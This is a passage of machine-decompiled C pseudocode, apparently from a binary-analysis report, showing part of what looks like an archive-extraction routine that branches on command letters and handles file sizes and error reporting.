												_t405 = L00A41B7F(_t596, _t88, (_t401 & 0xffffff00 | _t596 == 0x00000000) & 0x000000ff, _t401,  *(_t721 - 0x28)); // executed
												__eflags = _t405;
												if(__eflags == 0) {
													L14:
													_t406 = 0;
													__eflags = 0;
													L15:
													 *[fs:0x0] =  *((intOrPtr*)(_t721 - 0xc));
													return _t406;
												}
												_push(0x800);
												_t407 = _t697 + 0x1100;
												_push(_t407);
												 *((intOrPtr*)(_t721 - 0x38)) = _t407;
												_t91 = _t721 - 0x30b8; // -10424
												_push(_t582);
												E00A38167(__eflags);
												__eflags =  *(_t721 - 0xd);
												if( *(_t721 - 0xd) != 0) {
													L54:
													 *(_t721 - 0xe) = 0;
													L55:
													_t411 =  *(_t697 + 8);
													_t599 = 0x45;
													__eflags =  *((char*)(_t411 + 0x715b));
													_t686 = 0x58;
													 *((intOrPtr*)(_t721 - 0x34)) = _t599;
													 *((intOrPtr*)(_t721 - 0x30)) = _t686;
													if( *((char*)(_t411 + 0x715b)) != 0) {
														L57:
														__eflags = _t707 - _t599;
														if(_t707 == _t599) {
															L59:
															_t102 = _t721 - 0x20b8; // -6328
															E00A36EDB(_t102);
															_push(0);
															_t103 = _t721 - 0x20b8; // -6328
															_t416 = E00A3A56D(_t102, __eflags, _t697 + 0x1100, _t103);
															__eflags = _t416;
															if(_t416 == 0) {
																_t417 =  *(_t697 + 8);
																__eflags =  *((char*)(_t417 + 0x715b));
																_t114 = _t721 - 0xe;
																 *_t114 =  *(_t721 - 0xe) & (_t417 & 0xffffff00 |  *((char*)(_t417 + 0x715b)) != 0x00000000) - 0x00000001;
																__eflags =  *_t114;
																L65:
																_t116 = _t721 - 0x30b8; // -10424
																_t421 = E00A37C0D(_t582, _t116);
																__eflags = _t421;
																if(_t421 != 0) {
																	while(1) {
																		__eflags =  *(_t582 + 0x3333);
																		if( *(_t582 + 0x3333) == 0) {
																			goto L69;
																		}
																		_t121 = _t721 - 0x30b8; // -10424
																		_t552 = E00A38117(_t697, _t582, _t121);
																		__eflags = _t552;
																		if(_t552 == 0) {
																			 *((char*)(_t697 + 0x2100)) = 1;
																			goto L14;
																		}
																		L69:
																		_t123 = _t721 - 0x1174; // -2420
																		_t602 = 0x40;
																		memcpy(_t123,  *(_t697 + 8) + 0x6024, _t602 << 2);
																		_t725 = _t723 + 0xc;
																		asm("movsw");
																		_t125 = _t721 - 0x2c; // 0x7d4
																		 *(_t721 - 4) = 0;
																		asm("sbb ecx, ecx");
																		_t132 = _t721 - 0x1174; // -2420
																		E00A3D051( *(_t721 - 0x20), 0,  *((intOrPtr*)(_t582 + 0x3334)), _t132,  ~( *(_t582 + 0x3338) & 0x000000ff) & _t582 + 0x00003339, _t582 + 0x3349,  *((intOrPtr*)(_t582 + 0x3384)), _t582 + 0x3363, _t125);
																		__eflags =  *(_t582 + 0x3333);
																		if( *(_t582 + 0x3333) == 0) {
																			L77:
																			_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																			L78:
																			 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																			_t153 = _t721 - 0x1174; // -2420
																			L00A3F204(_t153);
																			_t154 = _t721 - 0x1070; // -2160
																			E00A39556(_t154);
																			_t611 =  *(_t582 + 0x3398);
																			_t431 = 1;
																			 *(_t721 - 0x20) = _t611;
																			 *(_t721 - 4) = 1;
																			_t688 = 0x50;
																			__eflags = _t611;
																			if(_t611 == 0) {
																				L88:
																				_t432 = E00A32209(_t582);
																				__eflags = _t432;
																				if(_t432 == 0) {
																					_t613 =  *(_t721 - 0xe);
																					__eflags = _t613;
																					if(_t613 == 0) {
																						L98:
																						_t431 = 1;
																						__eflags = 1;
																						L99:
																						__eflags =  *(_t582 + 0x6ccc);
																						if(__eflags == 0) {
																							__eflags = _t613;
																							if(_t613 == 0) {
																								L218:
																								 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																								_t368 = _t721 - 0x1070; // -2160
																								_t398 = E00A3959A(_t368);
																								__eflags =  *(_t721 - 0x11);
																								_t595 =  *(_t721 - 0xe);
																								_t689 =  *(_t721 - 0xd);
																								if( *(_t721 - 0x11) != 0) {
																									_t372 = _t697 + 0xf4;
																									 *_t372 =  *(_t697 + 0xf4) + 1;
																									__eflags =  *_t372;
																								}
																								L220:
																								__eflags =  *((char*)(_t697 + 0x68));
																								if( *((char*)(_t697 + 0x68)) != 0) {
																									goto L14;
																								}
																								__eflags = _t595;
																								if(_t595 != 0) {
																									L17:
																									_t406 = 1;
																									goto L15;
																								}
																								__eflags =  *(_t582 + 0x6ccc) - _t595;
																								if( *(_t582 + 0x6ccc) == _t595) {
																									L9:
																									E00A31F47(_t582);
																									goto L17;
																								}
																								__eflags = _t689;
																								_t406 = _t398 & 0xffffff00 | _t689 != 0x00000000;
																								goto L15;
																							}
																							L104:
																							_t616 =  *(_t721 - 0x18);
																							L105:
																							_t435 =  *(_t697 + 8);
																							__eflags =  *((char*)(_t435 + 0x7201));
																							if( *((char*)(_t435 + 0x7201)) == 0) {
																								L107:
																								_t436 =  *(_t721 - 0xd);
																								__eflags = _t436;
																								if(_t436 != 0) {
																									L112:
																									 *((char*)(_t721 - 0x12)) = 1;
																									__eflags = _t436;
																									if(_t436 != 0) {
																										L114:
																										 *((intOrPtr*)(_t697 + 0xf0)) =  *((intOrPtr*)(_t697 + 0xf0)) + 1;
																										 *((intOrPtr*)(_t697 + 0x80)) = 0;
																										 *((intOrPtr*)(_t697 + 0x84)) = 0;
																										 *((intOrPtr*)(_t697 + 0x88)) = 0;
																										 *((intOrPtr*)(_t697 + 0x8c)) = 0;
																										E00A3AB1A(_t697 + 0xd0, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0))); // executed
																										E00A3AB1A(_t697 + 0xa8, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
																										_t442 =  *(_t582 + 0x32f0);
																										_t712 = _t697 + 0x10;
																										_t619 =  *(_t582 + 0x32f4);
																										 *(_t697 + 0x38) = _t442;
																										 *(_t697 + 0x30) = _t442;
																										_t222 = _t721 - 0x1070; // -2160
																										 *(_t697 + 0x3c) = _t619;
																										 *(_t697 + 0x34) = _t619;
																										E00A3D099(_t712, _t582, _t222);
																										_t621 =  *((intOrPtr*)(_t721 - 0x12));
																										_t690 = 0;
																										_t445 =  *(_t721 - 0xd);
																										 *((char*)(_t697 + 0x41)) = _t621;
																										 *((char*)(_t697 + 0x42)) = _t445;
																										 *(_t721 - 0x28) = 0;
																										 *(_t721 - 0x24) = 0;
																										__eflags = _t621;
																										if(_t621 != 0) {
																											L132:
																											_t622 =  *(_t697 + 8);
																											__eflags =  *((char*)(_t622 + 0x71a0));
																											 *((char*)(_t721 - 0x1053)) =  *((char*)(_t622 + 0x71a0)) == 0;
																											__eflags =  *((char*)(_t721 - 0x12));
																											if( *((char*)(_t721 - 0x12)) != 0) {
																												L136:
																												_t446 = _t690;
																												 *((char*)(_t721 - 0x10)) = _t690;
																												L137:
																												__eflags =  *(_t721 - 0x20);
																												 *((char*)(_t721 - 0x14)) = 1;
																												 *((char*)(_t721 - 0xf)) = 1;
																												if( *(_t721 - 0x20) == 0) {
																													__eflags =  *(_t582 + 0x3330);
																													if( *(_t582 + 0x3330) == 0) {
																														__eflags =  *((char*)(_t582 + 0x22b8));
																														if(__eflags != 0) {
																															_push( *(_t582 + 0x3388) & 0x000000ff);
																															_push( *((intOrPtr*)(_t582 + 0x338c)));
																															E00A43377(_t582,  *((intOrPtr*)(_t697 + 0xe8)));
																															_t485 =  *((intOrPtr*)(_t697 + 0xe8));
																															 *(_t485 + 0x4c48) =  *(_t582 + 0x32f8);
																															__eflags = 0;
																															 *(_t485 + 0x4c4c) =  *(_t582 + 0x32fc);
																															 *((char*)(_t485 + 0x4c60)) = 0;
																															E00A43020( *((intOrPtr*)(_t697 + 0xe8)),  *((intOrPtr*)(_t582 + 0x22b4)),  *(_t582 + 0x3388) & 0x000000ff); // executed
																														} else {
																															_push( *(_t582 + 0x32fc));
																															_push( *(_t582 + 0x32f8));
																															_push(_t712);
																															E00A39215(_t582, _t697, __eflags);
																														}
																													}
																													L169:
																													E00A31F47(_t582);
																													__eflags =  *((char*)(_t582 + 0x3331));
																													if( *((char*)(_t582 + 0x3331)) != 0) {
																														L172:
																														_t448 = 0;
																														__eflags = 0;
																														_t624 = 0;
																														L173:
																														__eflags =  *(_t582 + 0x3388);
																														if( *(_t582 + 0x3388) != 0) {
																															__eflags =  *((char*)(_t582 + 0x22b8));
																															if( *((char*)(_t582 + 0x22b8)) == 0) {
																																L181:
																																__eflags =  *(_t721 - 0xd);
																																 *((char*)(_t721 - 0x10)) = _t448;
																																if( *(_t721 - 0xd) != 0) {
																																	L191:
																																	__eflags =  *(_t721 - 0x20);
																																	_t691 =  *((intOrPtr*)(_t721 - 0xf));
																																	if( *(_t721 - 0x20) == 0) {
																																		L195:
																																		_t625 = 0;
																																		__eflags = 0;
																																		L196:
																																		__eflags =  *((char*)(_t721 - 0x12));
																																		if( *((char*)(_t721 - 0x12)) != 0) {
																																			goto L218;
																																		}
																																		_t713 =  *(_t721 - 0x18);
																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x30));
																																		if(_t713 ==  *((intOrPtr*)(_t721 - 0x30))) {
																																			L199:
																																			__eflags =  *(_t721 - 0x20);
																																			if( *(_t721 - 0x20) == 0) {
																																				L203:
																																				__eflags = _t448;
																																				if(_t448 == 0) {
																																					L206:
																																					__eflags = _t625;
																																					if(_t625 != 0) {
																																						L214:
																																						_t449 =  *(_t697 + 8);
																																						__eflags =  *((char*)(_t449 + 0x71a8));
																																						if( *((char*)(_t449 + 0x71a8)) == 0) {
																																							_t714 = _t697 + 0x1100;
																																							_t450 = E00A3A4ED(_t697 + 0x1100,  *((intOrPtr*)(_t582 + 0x22bc))); // executed
																																							__eflags = _t450;
																																							if(__eflags == 0) {
																																								E00A32021(__eflags, 0x11, _t582 + 0x32, _t714);
																																								E00A36DCB(0xa71098, __eflags);
																																							}
																																						}
																																						 *(_t697 + 0x10ff) = 1;
																																						goto L218;
																																					}
																																					_t692 =  *(_t721 - 0x24);
																																					__eflags = _t692;
																																					_t628 =  *(_t721 - 0x28);
																																					if(_t692 > 0) {
																																						L209:
																																						__eflags = _t448;
																																						if(_t448 != 0) {
																																							L212:
																																							_t341 = _t721 - 0x1070; // -2160
																																							E00A39F09(_t341);
																																							L213:
																																							_t702 = _t582 + 0x32d8;
																																							asm("sbb eax, eax");
																																							asm("sbb ecx, ecx");
																																							asm("sbb eax, eax");
																																							_t349 = _t721 - 0x1070; // -2160
																																							E00A39DA2(_t349, _t582 + 0x32e8,  ~( *( *(_t697 + 8) + 0x82d0)) & _t702,  ~( *( *(_t697 + 8) + 0x82d4)) & _t582 + 0x000032e0,  ~( *( *(_t697 + 8) + 0x82d8)) & _t582 + 0x000032e8);
																																							_t350 = _t721 - 0x1070; // -2160
																																							E00A39620(_t350);
																																							E00A37A78( *((intOrPtr*)(_t721 - 0x1c)),  *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)), _t582,  *((intOrPtr*)(_t721 - 0x38)));
																																							asm("sbb eax, eax");
																																							asm("sbb eax, eax");
																																							__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702;
																																							E00A39D9F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d8)) & _t582 + 0x000032e8);
																																							_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																																							goto L214;
																																						}
																																						__eflags =  *((intOrPtr*)(_t697 + 0x88)) - _t628;
																																						if( *((intOrPtr*)(_t697 + 0x88)) != _t628) {
																																							goto L212;
																																						}
																																						__eflags =  *((intOrPtr*)(_t697 + 0x8c)) - _t692;
																																						if( *((intOrPtr*)(_t697 + 0x8c)) == _t692) {
																																							goto L213;
																																						}
																																						goto L212;
																																					}
																																					__eflags = _t628;
																																					if(_t628 == 0) {
																																						goto L213;
																																					}
																																					goto L209;
																																				}
																																				_t473 =  *(_t697 + 8);
																																				__eflags =  *((char*)(_t473 + 0x71a0));
																																				if( *((char*)(_t473 + 0x71a0)) == 0) {
																																					goto L218;
																																				}
																																				_t448 =  *((intOrPtr*)(_t721 - 0x10));
																																				goto L206;
																																			}
																																			__eflags = _t625;
																																			if(_t625 != 0) {
																																				goto L203;
																																			}
																																			__eflags =  *(_t582 + 0x3398) - 5;
																																			if( *(_t582 + 0x3398) != 5) {
																																				goto L218;
																																			}
																																			__eflags = _t691;
																																			if(_t691 == 0) {
																																				goto L218;
																																			}
																																			goto L203;
																																		}
																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x34));
																																		if(_t713 !=  *((intOrPtr*)(_t721 - 0x34))) {
																																			goto L218;
																																		}
																																		goto L199;
																																	}
																																	__eflags =  *(_t582 + 0x3398) - 4;
																																	if( *(_t582 + 0x3398) != 4) {
																																		goto L195;
																																	}
																																	__eflags = _t691;
																																	if(_t691 == 0) {
																																		goto L195;
																																	}
																																	_t625 = 1;
																																	goto L196;
																																}
																																__eflags =  *((char*)(_t721 - 0x14));
																																if( *((char*)(_t721 - 0x14)) == 0) {
																																	goto L191;
																																}
																																__eflags = _t624;
																																if(_t624 != 0) {
																																	goto L191;
																																}
																																__eflags =  *(_t582 + 0x3333) - _t624;
																																if(__eflags == 0) {
																																	L189:
																																	_push(3);
																																	L190:
																																	_pop(_t637);
																																	_t321 = _t721 - 0x30b8; // -10424
																																	E00A32021(__eflags, _t637, _t582 + 0x32, _t321);
																																	 *((char*)(_t721 - 0x10)) = 1;
																																	E00A36D83(0xa71098, 3);
																																	_t448 =  *((intOrPtr*)(_t721 - 0x10));
																																	goto L191;
																																}
																																__eflags =  *((intOrPtr*)(_t582 + 0x3359)) - _t624;
																																if( *((intOrPtr*)(_t582 + 0x3359)) == _t624) {
																																	L187:
																																	__eflags =  *((char*)(_t697 + 0xfc));
																																	if(__eflags != 0) {
																																		goto L189;
																																	}
																																	_push(4);
																																	goto L190;
																																}
																																__eflags =  *(_t582 + 0x6cdc) - _t624;
																																if(__eflags == 0) {
																																	goto L189;
																																}
																																goto L187;
																															}
																															__eflags =  *(_t582 + 0x32fc) - _t448;
																															if(__eflags < 0) {
																																goto L181;
																															}
																															if(__eflags > 0) {
																																L179:
																																__eflags = _t624;
																																if(_t624 != 0) {
																																	 *((char*)(_t697 + 0xfc)) = 1;
																																}
																																goto L181;
																															}
																															__eflags =  *(_t582 + 0x32f8) - _t448;
																															if( *(_t582 + 0x32f8) <= _t448) {
																																goto L181;
																															}
																															goto L179;
																														}
																														 *((char*)(_t697 + 0xfc)) = _t448;
																														goto L181;
																													}
																													asm("sbb eax, eax");
																													_t482 = E00A3AAEA(_t582, _t697 + 0xd0, _t582 + 0x3308,  ~( *(_t582 + 0x3362) & 0x000000ff) & _t582 + 0x00003363);
																													__eflags = _t482;
																													if(_t482 == 0) {
																														goto L172;
																													}
																													_t624 = 1;
																													_t448 = 0;
																													goto L173;
																												}
																												_t716 =  *(_t582 + 0x3398);
																												__eflags = _t716 - 4;
																												if(_t716 == 4) {
																													L151:
																													_t270 = _t721 - 0x50b8; // -18616
																													E00A3B76C(_t582, _t582 + 0x339c, _t270, 0x800);
																													_push(0x800);
																													_t272 = _t721 - 0x40b8; // -14520
																													_t645 = _t697;
																													_t273 = _t721 - 0x50b8; // -18616
																													_push(_t582);
																													E00A38167(__eflags);
																													_t446 =  *((intOrPtr*)(_t721 - 0x10));
																													__eflags = _t446;
																													if(_t446 == 0) {
																														L159:
																														_t646 =  *((intOrPtr*)(_t721 - 0xf));
																														L160:
																														__eflags =  *((intOrPtr*)(_t582 + 0x6cc8)) - 2;
																														if( *((intOrPtr*)(_t582 + 0x6cc8)) != 2) {
																															L146:
																															__eflags = _t446;
																															if(_t446 == 0) {
																																L163:
																																_t495 = 0;
																																__eflags = 0;
																																L164:
																																 *(_t697 + 0x10ff) = _t495;
																																goto L169;
																															}
																															L147:
																															__eflags = _t646;
																															if(_t646 == 0) {
																																goto L163;
																															}
																															_t495 = 1;
																															goto L164;
																														}
																														__eflags = _t446;
																														if(_t446 != 0) {
																															goto L147;
																														}
																														L145:
																														 *((char*)(_t721 - 0x14)) = 0;
																														goto L146;
																													}
																													__eflags =  *((short*)(_t721 - 0x40b8));
																													if( *((short*)(_t721 - 0x40b8)) == 0) {
																														goto L159;
																													}
																													_t276 = _t721 - 0x40b8; // -14520
																													_push(0x800);
																													_push(_t697 + 0x1100);
																													__eflags = _t716 - 4;
																													if(__eflags != 0) {
																														_push(_t582 + 0x32);
																														_t281 = _t721 - 0x1070; // -2160
																														_t500 = E00A39155(_t690, _t697, _t716, __eflags);
																														_t646 = _t500;
																														 *((char*)(_t721 - 0xf)) = _t500;
																														L157:
																														__eflags = _t646;
																														if(_t646 == 0) {
																															L144:
																															_t446 =  *((intOrPtr*)(_t721 - 0x10));
																															goto L145;
																														}
																														_t446 =  *((intOrPtr*)(_t721 - 0x10));
																														goto L160;
																													}
																													_push( *(_t697 + 8));
																													_t501 = E00A37542(_t645, _t697, __eflags);
																													L155:
																													_t646 = _t501;
																													 *((char*)(_t721 - 0xf)) = _t646;
																													goto L157;
																												}
																												__eflags = _t716 - 5;
																												if(_t716 == 5) {
																													goto L151;
																												}
																												__eflags = _t716 - 1;
																												if(_t716 == 1) {
																													L149:
																													__eflags = _t446;
																													if(_t446 == 0) {
																														goto L159;
																													}
																													_push(_t697 + 0x1100);
																													_t501 = E00A377B8(_t622, _t697 + 0x10, _t582);
																													goto L155;
																												}
																												__eflags = _t716 - 2;
																												if(_t716 == 2) {
																													goto L149;
																												}
																												__eflags = _t716 - 3;
																												if(__eflags == 0) {
																													goto L149;
																												}
																												E00A32021(__eflags, 0x47, _t582 + 0x32, _t697 + 0x1100);
																												__eflags = 0;
																												_t646 = 0;
																												 *((char*)(_t721 - 0xf)) = 0;
																												goto L144;
																											}
																											__eflags = _t445;
																											if(_t445 != 0) {
																												goto L136;
																											}
																											_t508 = 0x50;
																											__eflags =  *(_t721 - 0x18) - _t508;
																											if( *(_t721 - 0x18) == _t508) {
																												goto L136;
																											}
																											_t446 = 1;
																											 *((char*)(_t721 - 0x10)) = 1;
																											goto L137;
																										}
																										__eflags =  *(_t582 + 0x6cdc);
																										if( *(_t582 + 0x6cdc) != 0) {
																											goto L132;
																										}
																										_t717 =  *(_t582 + 0x32fc);
																										_t695 =  *(_t582 + 0x32f8);
																										__eflags = _t717;
																										if(__eflags < 0) {
																											L131:
																											_t690 = 0;
																											__eflags = 0;
																											_t712 = _t697 + 0x10;
																											goto L132;
																										}
																										if(__eflags > 0) {
																											L119:
																											_t649 =  *(_t582 + 0x32f0);
																											_t650 = _t649 << 0xa;
																											__eflags = ( *(_t582 + 0x32f4) << 0x00000020 | _t649) << 0xa - _t717;
																											if(__eflags < 0) {
																												L130:
																												_t445 =  *(_t721 - 0xd);
																												goto L131;
																											}
																											if(__eflags > 0) {
																												L122:
																												__eflags =  *((intOrPtr*)(_t582 + 0x10)) - 1;
																												if( *((intOrPtr*)(_t582 + 0x10)) == 1) {
																													goto L130;
																												}
																												__eflags = _t717;
																												if(__eflags < 0) {
																													L129:
																													_t244 = _t721 - 0x1070; // -2160
																													E00A39A3C(_t244,  *(_t582 + 0x32f8),  *(_t582 + 0x32fc));
																													 *(_t721 - 0x28) =  *(_t582 + 0x32f8);
																													 *(_t721 - 0x24) =  *(_t582 + 0x32fc);
																													goto L130;
																												}
																												if(__eflags > 0) {
																													L126:
																													_t515 = E00A3981A(_t695);
																													__eflags = _t695 -  *(_t582 + 0x32f4);
																													if(__eflags < 0) {
																														goto L130;
																													}
																													if(__eflags > 0) {
																														goto L129;
																													}
																													__eflags = _t515 -  *(_t582 + 0x32f0);
																													if(_t515 <=  *(_t582 + 0x32f0)) {
																														goto L130;
																													}
																													goto L129;
																												}
																												__eflags = _t695 - 0x5f5e100;
																												if(_t695 < 0x5f5e100) {
																													goto L129;
																												}
																												goto L126;
																											}
																											__eflags = _t650 - _t695;
																											if(_t650 <= _t695) {
																												goto L130;
																											}
																											goto L122;
																										}
																										__eflags = _t695 - 0xf4240;
																										if(_t695 <= 0xf4240) {
																											goto L131;
																										}
																										goto L119;
																									}
																									L113:
																									_t202 = _t697 + 0xec;
																									 *_t202 =  *(_t697 + 0xec) + 1;
																									__eflags =  *_t202;
																									goto L114;
																								}
																								 *((char*)(_t721 - 0x12)) = 0;
																								_t517 = 0x50;
																								__eflags = _t616 - _t517;
																								if(_t616 != _t517) {
																									_t196 = _t721 - 0x1070; // -2160
																									__eflags = E00A398BC(_t196);
																									if(__eflags != 0) {
																										E00A32021(__eflags, 0x3b, _t582 + 0x32, _t697 + 0x1100);
																										E00A36E98(0xa71098, _t721, _t582 + 0x32, _t697 + 0x1100);
																									}
																								}
																								goto L113;
																							}
																							 *(_t697 + 0x10ff) = 1;
																							__eflags =  *((char*)(_t435 + 0x7201));
																							if( *((char*)(_t435 + 0x7201)) != 0) {
																								_t436 =  *(_t721 - 0xd);
																								goto L112;
																							}
																							goto L107;
																						}
																						 *(_t721 - 0xd) = _t431;
																						 *(_t721 - 0xe) = _t431;
																						_t185 = _t721 - 0x30b8; // -10424
																						_t525 = L00A41B7F(__eflags, _t185, 0, 0, _t431);
																						__eflags = _t525;
																						if(_t525 != 0) {
																							goto L104;
																						}
																						__eflags = 0;
																						 *(_t721 - 0x24) = 0;
																						L102:
																						_t187 = _t721 - 0x1070; // -2160
																						E00A3959A(_t187);
																						_t406 =  *(_t721 - 0x24);
																						goto L15;
																					}
																					_t180 = _t721 - 0x1070; // -2160
																					_push(_t582);
																					_t529 = E00A37FC0(_t697);
																					_t613 = _t529;
																					 *(_t721 - 0xe) = _t529;
																					L97:
																					__eflags = _t613;
																					if(_t613 != 0) {
																						goto L104;
																					}
																					goto L98;
																				}
																				__eflags =  *(_t721 - 0xe);
																				if( *(_t721 - 0xe) != 0) {
																					_t530 =  *(_t721 - 0x18);
																					__eflags = _t530 - 0x50;
																					if(_t530 != 0x50) {
																						_t657 = 0x49;
																						__eflags = _t530 - _t657;
																						if(_t530 != _t657) {
																							_t658 = 0x45;
																							__eflags = _t530 - _t658;
																							if(_t530 != _t658) {
																								_t531 =  *(_t697 + 8);
																								__eflags =  *((intOrPtr*)(_t531 + 0x7160)) - 1;
																								if( *((intOrPtr*)(_t531 + 0x7160)) != 1) {
																									 *(_t697 + 0xec) =  *(_t697 + 0xec) + 1;
																									_t178 = _t721 - 0x30b8; // -10424
																									_push(_t582);
																									E00A37DB2(_t697);
																								}
																							}
																						}
																					}
																				}
																				goto L102;
																			}
																			__eflags = _t611 - 5;
																			if(_t611 == 5) {
																				goto L88;
																			}
																			_t613 =  *(_t721 - 0xe);
																			__eflags = _t613;
																			if(_t613 == 0) {
																				goto L99;
																			}
																			_t616 =  *(_t721 - 0x18);
																			__eflags = _t616 - _t688;
																			if(_t616 == _t688) {
																				goto L105;
																			}
																			_t534 =  *(_t697 + 8);
																			__eflags =  *((char*)(_t534 + 0x7201));
																			if( *((char*)(_t534 + 0x7201)) != 0) {
																				goto L105;
																			}
																			_t719 = _t697 + 0x1100;
																			 *((char*)(_t721 - 0x12)) = 0;
																			_t536 = E00A3A231(_t719);
																			__eflags = _t536;
																			if(_t536 == 0) {
																				L86:
																				__eflags =  *((char*)(_t721 - 0x12));
																				if( *((char*)(_t721 - 0x12)) == 0) {
																					goto L104;
																				}
																				L87:
																				_t613 = 0;
																				 *(_t721 - 0xe) = 0;
																				goto L97;
																			}
																			__eflags =  *((char*)(_t721 - 0x12));
																			if( *((char*)(_t721 - 0x12)) != 0) {
																				goto L87;
																			}
																			__eflags = 0;
																			_push(0);
																			_push(_t582 + 0x32d8);
																			_push( *(_t582 + 0x32fc));
																			_t167 = _t721 - 0x12; // 0x7ee
																			_push( *(_t582 + 0x32f8));
																			_push(0x800);
																			_push(_t719);
																			_push(0);
																			_push( *(_t697 + 8));
																			E00A392A3();
																			goto L86;
																		}
																		__eflags =  *((char*)(_t582 + 0x3359));
																		if( *((char*)(_t582 + 0x3359)) == 0) {
																			goto L77;
																		}
																		_t137 = _t721 - 0x2c; // 0x7d4
																		_t543 = E00A50C4A(_t582 + 0x335a, _t137, 8);
																		_t723 = _t725 + 0xc;
																		__eflags = _t543;
																		if(_t543 == 0) {
																			goto L77;
																		}
																		__eflags =  *(_t582 + 0x6cdc);
																		_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																		if( *(_t582 + 0x6cdc) != 0) {
																			goto L78;
																		}
																		__eflags =  *((char*)(_t697 + 0x10fe));
																		_t142 = _t721 - 0x30b8; // -10424
																		_push(_t582 + 0x32);
																		if(__eflags != 0) {
																			_push(6);
																			E00A32021(__eflags);
																			E00A36D83(0xa71098, 0xb);
																			 *(_t721 - 0xe) = 0;
																			goto L78;
																		}
																		_push(0x83);
																		E00A32021(__eflags);
																		E00A3F279( *(_t697 + 8) + 0x6024);
																		 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																		_t147 = _t721 - 0x1174; // -2420
																		L00A3F204(_t147);
																	}
																}
																E00A36D83(0xa71098, 2);
																_t554 = E00A31F47(_t582);
																__eflags =  *(_t582 + 0x6ccc);
																_t406 = _t554 & 0xffffff00 |  *(_t582 + 0x6ccc) == 0x00000000;
																goto L15;
															}
															_t106 = _t721 - 0x10a8; // -2216
															_t556 = E00A37BE7(_t106, _t582 + 0x32d8);
															__eflags = _t556;
															if(_t556 == 0) {
																goto L65;
															}
															__eflags =  *((char*)(_t721 - 0x10ac));
															if( *((char*)(_t721 - 0x10ac)) == 0) {
																L63:
																 *(_t721 - 0xe) = 0;
																goto L65;
															}
															_t108 = _t721 - 0x10a8; // -2216
															_t558 = E00A37BCA(_t108, _t697);
															__eflags = _t558;
															if(_t558 == 0) {
																goto L65;
															}
															goto L63;
														}
														__eflags = _t707 - _t686;
														if(_t707 != _t686) {
															goto L65;
														}
														goto L59;
													}
													__eflags =  *((char*)(_t411 + 0x715c));
													if( *((char*)(_t411 + 0x715c)) == 0) {
														goto L65;
													}
													goto L57;
												}
												__eflags =  *(_t697 + 0x1100);
												if( *(_t697 + 0x1100) == 0) {
													goto L54;
												}
												 *(_t721 - 0xe) = 1;
												__eflags =  *(_t582 + 0x3330);
												if( *(_t582 + 0x3330) == 0) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t707 - _t400;
											_t401 = 1;
											if(_t707 != _t400) {
												goto L50;
											}
											goto L49;
										}
										L45:
										_t689 =  *(_t582 + 0x6ccc);
										 *(_t721 - 0xd) = _t689;
										 *(_t721 - 0x28) = _t689;
										__eflags = _t689;
										if(_t689 == 0) {
											goto L220;
										}
										_t685 = 0;
										__eflags = 0;
										goto L47;
									}
									_t398 =  *(_t697 + 8);
									__eflags =  *(_t398 + 0x6127);
									if( *(_t398 + 0x6127) == 0) {
										goto L44;
									}
									__eflags =  *(_t582 + 0x6ccc);
									if( *(_t582 + 0x6ccc) != 0) {
										goto L14;
									}
									 *(_t721 - 0x11) = 0;
									goto L45;
								}
								__eflags =  *(_t697 + 0xf4) -  *((intOrPtr*)(_t586 + 0xb334));
								if( *(_t697 + 0xf4) <  *((intOrPtr*)(_t586 + 0xb334))) {
									goto L29;
								}
								__eflags =  *((char*)(_t697 + 0xf9));
								if( *((char*)(_t697 + 0xf9)) != 0) {
									goto L14;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t582 + 0x32f8) = _t684;
								 *(_t582 + 0x32fc) = _t684;
								goto L26;
							}
							__eflags =  *(_t582 + 0x32f8) - _t684;
							if( *(_t582 + 0x32f8) >= _t684) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t582 + 0x32f0) = _t684;
							 *(_t582 + 0x32f4) = _t684;
							goto L22;
						}
						__eflags =  *(_t582 + 0x32f0) - _t684;
						if( *(_t582 + 0x32f0) >= _t684) {
							goto L22;
						}
						goto L21;
					}
					if(_t383 != 3) {
						__eflags = _t383 - 5;
						if(_t383 != 5) {
							goto L9;
						}
						__eflags =  *((char*)(_t582 + 0x45c4));
						if( *((char*)(_t582 + 0x45c4)) == 0) {
							goto L14;
						}
						_push(_t585);
						_push(_t684);
						_push(_t704);
						_push(_t582);
						_t573 = E00A48C8D();
						__eflags = _t573;
						if(_t573 != 0) {
							__eflags = 0;
							 *0xa63278( *((intOrPtr*)(_t582 + 0x6cb8)),  *((intOrPtr*)(_t582 + 0x6cbc)), 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t582 + 0x10))))();
							goto L17;
						}
						L13:
						E00A36D83(0xa71098, 1);
						goto L14;
					} else {
						if( *(_t697 + 0x10ff) != 0) {
							E00A37A0D(_t582, _t721,  *(_t697 + 8), _t582, _t697 + 0x1100);
						}
						goto L9;
					}
				}
				if( *((intOrPtr*)(__ecx + 0x67)) == 0) {
					goto L14;
				}
				_push(_t585);
				_push(0);
				_t704 = __ecx + 0x10;
				_push(_t704);
				_push(_t582);
				 *(_t721 - 0x20) = _t704;
				if(E00A48C8D() == 0) {
					goto L13;
				} else {
					_t585 =  *(_t721 - 0x18);
					_t684 = 0;
					goto L5;
				}
			}

0x00a38493
0x00a3849d
0x00a384a3
0x00a384a6
0x00a384aa
0x00a384ac
0x00a384b2
0x00a384b9
0x00a384bf
